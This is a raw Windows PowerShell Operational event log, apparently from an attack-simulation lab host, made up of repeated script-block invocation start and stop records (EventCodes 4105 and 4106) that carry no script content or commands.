User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467762
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467761
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467760
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467759
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467758
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467757
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467756
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467755
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467754
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467753
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467752
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467751
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467750
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467749
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467748
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467747
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467746
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467745
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467744
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467743
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467742
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467741
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467740
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467739
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467738
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467737
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467736
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467735
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467734
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467733
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467732
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467731
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467730
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467729
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467728
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467727
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467726
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467725
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467724
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467723
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467722
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467721
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467720
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467719
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467718
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467717
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467716
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467715
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467714
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467713
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467712
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467711
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467710
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467709
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467708
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467707
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
